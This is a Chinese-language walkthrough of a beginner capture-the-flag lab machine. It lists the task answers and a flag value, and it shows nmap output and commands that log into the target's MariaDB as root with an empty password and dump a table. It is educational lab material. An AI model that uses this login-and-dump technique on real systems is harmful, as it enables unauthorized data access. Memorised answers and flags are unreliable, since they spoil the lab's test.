声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

TASK 1

问：在我们的扫描过程中，我们发现哪个端口提供MySQL服务?
答：3306

TASK 2

问：目标用户运行的是哪个社区开发的MySQL版本？
答：MariaDB

TASK 3

问：当使用MySQL命令行客户端时，我们需要使用什么开关来指定登录用户名？
答：-u

TASK 4

问：哪个用户名允许我们在不提供密码的情况下登录到此MariaDB实例？
答：root

TASK 5

问：在SQL中，我们可以使用什么符号在查询中指定我们想要显示表中的所有内容?
答：*

TASK 6

问：在SQL中，我们需要用什么符号来结束每个查询?
答：;

TASK 7

问：这个MySQL实例中有三个数据库在所有MySQL实例中都是通用的。这个主机所特有的第四个名字是什么?
答：htb

SUBMIT FLAG

问：Submit root flag
答：

# P.S.扫端口开放
kali@kali:~/Test$ nmap -sC -T4 10.129.181.249
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-28 14:24 CST
Warning: 10.129.181.249 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.129.181.249
Host is up (0.63s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
513/tcp  filtered login
3306/tcp open     mysql
| mysql-info: 
|   Protocol: 10
|   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
|   Thread ID: 37
|   Capabilities flags: 63486
|   Some Capabilities: Support41Auth, ConnectWithDatabase, DontAllowDatabaseTableColumn, Speaks41ProtocolOld, Speaks41ProtocolNew, SupportsLoadDataLocal, SupportsTransactions, FoundRows, IgnoreSigpipes, InteractiveClient, IgnoreSpaceBeforeParenthesis, SupportsCompression, ODBCClient, LongColumnFlag, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
|   Status: Autocommit
|   Salt: ,pqi<.pjEYqKc1f1_kzF
|_  Auth Plugin Name: mysql_native_password
5666/tcp filtered nrpe

Nmap done: 1 IP address (1 host up) scanned in 206.72 seconds
# P.S.以 root 用户空密码连接 MySQL 服务
kali@kali:~/Test$ mysql -h10.129.181.249 -uroot
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 76
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

# P.S.显示所有数据库名
MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| htb                |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.343 sec)

# P.S.切换数据库
MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
# P.S.显示当前数据库下的所有表名
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config        |
| users         |
+---------------+
2 rows in set (0.267 sec)

# P.S.查询 config 表下的所有字段内容
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name                  | value                            |
+----+-----------------------+----------------------------------+
|  1 | timeout               | 60s                              |
|  2 | security              | default                          |
|  3 | auto_logon            | false                            |
|  4 | max_size              | 2M                               |
|  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
|  6 | enable_uploads        | false                            |
|  7 | authentication_method | radius                           |
+----+-----------------------+----------------------------------+
7 rows in set (0.386 sec)

P.S.3306 端口开放，root 用户空密码连接靶机 MySQL ，查找相关字段。